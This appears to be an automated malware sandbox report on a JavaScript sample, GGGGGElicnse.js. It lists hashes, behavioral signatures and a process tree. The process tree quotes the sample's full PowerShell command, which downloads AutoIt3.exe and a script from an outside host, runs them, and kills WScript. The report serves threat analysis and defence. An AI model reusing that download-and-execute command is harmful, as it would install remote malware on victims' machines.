Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231023-en -
submitted
04-11-2023 11:04
Static task
static1
Behavioral task
behavioral1
Sample
GGGGGElicnse.js
Resource
win7-20231023-en
4 signatures
300 seconds
Behavioral task
behavioral2
Sample
GGGGGElicnse.js
Resource
win10-20231020-en
9 signatures
300 seconds
Behavioral task
behavioral3
Sample
GGGGGElicnse.js
Resource
win10v2004-20231020-en
10 signatures
300 seconds
General
-
Target
GGGGGElicnse.js
-
Size
253KB
-
MD5
bb897b6af926de14bba7e9752318061a
-
SHA1
2dbd55f9cedb96553a18cb863e27b8d608cce40c
-
SHA256
ae0f7106f8b0e11c5526a8f1326c4705266a24cc933b5caa4dca735692cd959f
-
SHA512
9c0e544f9748339b1c6e480468f8d8fde1601ba9c2bf9c17c1d5858f640dc197ebd2dc93a78f3cb525f7bc8887ba45eb678e2dbbd52a3f9dbd65ae543672d09b
-
SSDEEP
6144:de7hgXeerjqlI2Iro+W8Bne7hgXeerjqlI2Iro+8:dIhgSlI23J8pIhgSlI23V
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1164 powershell.exe 1164 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1164 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1768 wrote to memory of 1164 1768 wscript.exe 28 PID 1768 wrote to memory of 1164 1768 wscript.exe 28 PID 1768 wrote to memory of 1164 1768 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\GGGGGElicnse.js1⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://showmoreresultonliner.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://showmoreresultonliner.com:2351/msiyfjjdsnw' -OutFile 'yfjjdsnw.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'yfjjdsnw.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164
-